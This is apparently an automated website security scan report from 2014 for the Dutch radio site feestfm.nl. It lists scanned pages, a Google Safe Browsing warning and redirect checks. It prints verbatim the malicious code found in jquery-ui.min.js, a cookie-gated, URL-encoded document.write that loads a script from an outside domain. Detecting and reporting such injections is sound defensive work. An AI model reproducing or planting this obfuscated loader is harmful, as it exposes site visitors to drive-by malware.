Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=feestfm.nl
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://feestfm.nl/ | 200 OK Content-Length: 11981 Content-Type: text/html | clean |
http://feestfm.nl/js/jquery.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
http://feestfm.nl/js/cycle.js | 200 OK Content-Length: 23729 Content-Type: text/javascript | clean |
http://feestfm.nl/js/cufon-yui.js | 200 OK Content-Length: 18257 Content-Type: text/javascript | clean |
http://feestfm.nl/js/lafayette_400.font.js | 200 OK Content-Length: 21948 Content-Type: text/javascript | clean |
http://feestfm.nl/js/jquery-ui.min.js | 200 OK Content-Length: 184441 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($){$.ui={plugin:{add:function(module,option,set){var proto=$.ui[module].prototype;for(var i in set){proto.plugins[i]=proto.plugins[i]||[];proto.plugins[i].push([option,set[i]]);}},call:function(instance,name,args){var set=instance.plugins[name];if(!set){return;} for(var i=0;i<set.length;i++){if(instance.options[set[i][0]]){set[i][1].apply(instance.element,args);}}}},cssCache:{},css:function(name){if($.ui.cssCache[name]){return $.ui.cssCache[name];} var tmp=$('<div class= if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports:
| ||
http://feestfm.nl/index.php | 200 OK Content-Length: 11975 Content-Type: text/html | clean |
http://feestfm.nl/programma.php | 200 OK Content-Length: 10734 Content-Type: text/html | clean |
http://feestfm.nl/js/jquery.tabs.min.js | 200 OK Content-Length: 8755 Content-Type: text/javascript | clean |
http://feestfm.nl/roadshows.php | 200 OK Content-Length: 10617 Content-Type: text/html | clean |
http://feestfm.nl/top20.php | 200 OK Content-Length: 9409 Content-Type: text/html | clean |
http://feestfm.nl/nieuws.php | 200 OK Content-Length: 13264 Content-Type: text/html | clean |
http://feestfm.nl/js/ui.core.js | 200 OK Content-Length: 13931 Content-Type: text/javascript | clean |
http://feestfm.nl/js/ui.accordion.js | 200 OK Content-Length: 13467 Content-Type: text/javascript | clean |
http://feestfm.nl/licentie.php | 200 OK Content-Length: 9178 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: feestfm.nl
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 16 Dec 2014 04:23:08 GMT
Pragma: no-cache
Server: nginx/1.6.2
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=dnbrqnlvm1co8r5tcpk0fkeah3; expires=Wed, 17-Dec-2014 04:23:07 GMT; path=/
X-Powered-By: PHP/5.4.34
GET / HTTP/1.1
Host: feestfm.nl
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 16 Dec 2014 04:23:08 GMT
Pragma: no-cache
Server: nginx/1.6.2
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=dnbrqnlvm1co8r5tcpk0fkeah3; expires=Wed, 17-Dec-2014 04:23:07 GMT; path=/
X-Powered-By: PHP/5.4.34
Second query (visit from search engine):
GET / HTTP/1.1
Host: feestfm.nl
Referer: http://www.google.com/search?q=feestfm.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: feestfm.nl
Referer: http://www.google.com/search?q=feestfm.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.